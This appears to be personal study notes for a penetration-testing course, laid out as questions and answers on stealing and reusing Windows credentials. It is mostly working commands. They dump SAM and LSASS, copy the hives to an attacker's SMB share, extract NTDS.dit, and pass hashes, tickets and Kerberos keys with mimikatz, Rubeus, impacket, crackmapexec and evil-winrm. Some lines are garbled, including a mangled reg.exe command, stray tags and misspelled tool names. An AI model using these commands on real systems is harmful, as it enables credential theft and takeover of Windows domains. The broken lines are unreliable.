Windows Password attacks

Question 1

attacking sam with in built cmd tool. what are the 3 registry hive? which are essentials?

how to transfer to linux machine

Answer 1

reg.exe save hklm\sam C:\sam.save

reg.exe system hklm\sam C:\system.save (system bootkey, essential)

reg.exe save hklm\security C:\sam.security (cached domain accounts)

transfer –> python3 smbserver.py -smb2support culo_share $(pwd)
move sam.save \my_ip\culo_share

Question 2

attacking sam from remote and lsa

Answer 2

crackmapexec smb ip –local-auth -u … -p … –sam (or –lsa)

Question 2

attacking lsass from a windows RDP and from cmd. then crack them

Answer 2

1)task manager –> process –> local security authority process
2)get-process lsass (find the PID)
rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID>
3)from the dmp file extract creds locally with pypykatz lsa minidump lsass.dmp
4)crack the hashes</PID>

Question 3

Capturing NTDS.dit

Answer 3

only for domain joined users (they don’t reference to SAM database)
1)crackmapexec smb ip -u .. -p .. –ntds
2)or locally look for %systemroot%/ntds

Question 4

Pass the Hash NTLM
(mimikatz, invoke-thehash, impacket, crackmapexec, evil-winrm, xfreerdp)

Answer 4

1)mimikatz.exe privilege::debug
sekurlsa::pth
/user:julio /rc4:<hash> /run:cmd.exe (if unknown domain domain:.)</hash>

from there you can check the new shares you have access to (get-smbconnection, get-smbshare)

2) invoke-thehash
import-module invoke-thehash.psd1

invoke-wmiexec -tagert DC01 -Domain inlane.htb -Username … -Hash … -Command “<rev shell, like in base64>”

3) impacket-psexec admin@ip -hashes :..

4) crackmapexec smb ip/ip_range -u … -d . -H <hash></hash>

5) evil-winrm -i ip -u … -H

6) xfreerdp /v:— /u:… /pth:…

Question 5

pass the ticket
gathering tickets and using them with mimikatz

Answer 5

1)gather tickets mimikatz.exe
privilege::debug
sekurlsa::tickets /export
2)mimikatz.exe
privilege::debug
kerberos::ptt “C:...\ticket.kirby” –> this creates a new cmd
or in mimiktz–> misc::cmd

Question 6

pass the key
key generation from ntlm hashes and passing with mimikatz or rubeus

Answer 6

1) extract kerberos key
mimikatz.exe
privilege::debug
sekurlsa::ekeys –> we get the key (aes256, …) and username
2) mimikatz
privilege::debug
sekurlsa::pth /domain:inlane.htb /user:username /ntlm:<key, aes256,…> –> creates a new cmd!
3) or with rubeus
rubeus-exe asktgt /domain:inlane.htb /user:.. /aes256:… /nowrap

Question 7

pass the ticket, get tickets and pass them with rubeus

Answer 7

1) rubeus.exe dump /nowrap
2) rubeus.exe asktgt /domain:inlane.htb /user:… /ptt /rcp:<ticket>
or pass the kirbi file
rubeus.exe ptt /ticket:file.kirbi
or in base64 /ticket:....</ticket>

Question 8

pass the ticket in linux

Answer 8

1)keytab files –>
kinit user@domain -k -t /opt/user.keytab
klist to check if imported correct
–> access shares

2)keyrabextract.py file.keytab –> crack hashes